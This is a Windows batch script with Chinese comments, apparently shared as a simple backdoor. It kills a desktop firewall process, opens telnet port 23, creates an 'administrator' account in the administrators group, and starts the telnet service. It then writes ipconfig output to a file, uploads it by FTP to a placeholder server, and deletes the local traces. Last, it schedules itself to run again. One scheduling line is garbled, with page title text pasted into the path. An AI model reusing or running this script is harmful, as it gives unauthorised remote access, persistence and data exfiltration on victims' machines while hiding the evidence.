bat文件:
echo *******************
echo 关闭天网防火墙
taskkill /f /im pfw.exe
echo *******************
echo 在windows默认防火墙上打开tenlet使用的23端口
netsh firewall add portopening tcp 23 telnet
echo *******************
echo 添加一个近似管理员administrator的帐号
net user administrator /add
net localgroup administrators administrator /add
echo *******************
echo 启动telnet服务
sc config tlntsvr start= auto
net start telnet
echo *******************
echo 自动将ip地址发送至指定的位置
echo 检测是否存在指定的文件,如果有,则跳到删除操作
if exist f:\temp\abc.txt goto next
if exist f:\temp\ip.txt goto next
goto next1
:next
del f:\temp\abc.txt
del f:\temp\ip.txt
:next1
echo 将IP地址保存至ip.txt这个文件
ipconfig /all >>ip.txt
echo 制作FTP执行脚本,用户可以自行扩充
echo 登录FTP服务器
echo open youftp.com >>f:\temp\abc.txt
echo ftpUsername >>f:\temp\abc.txt
echo ftp password >>f:\temp\abc.txt
echo binary >>f:\temp\abc.txt
echo 删除FTP上旧的ip.txt文件,并上传新的ip.txt文件
echo delete ip.txt >>f:\temp\abc.txt
echo f:\temp\ip.txt >>f:\temp\abc.txt
echo put f:\temp\ip.txt >>f:\temp\abc.txt
echo bye >>f:\temp\abc.txt
echo 执行前面定义的FTP脚本
ftp -s:f:\temp\abc.txt
echo 清除本地痕迹
del f:\temp\abc.txt
del f:\temp\ip.txt
echo *******************
echo 启动定时执行服务
sc config schedule start= auto
net start schedule
@at 10:03 BAT|一个简单的后门bat文件看批处理命令及一般的后门程序思路-bat文件ystemrootsystem32\sample18.bat
@at 20:03 ystemrootsystem32\sample18.bat
exit
-End-
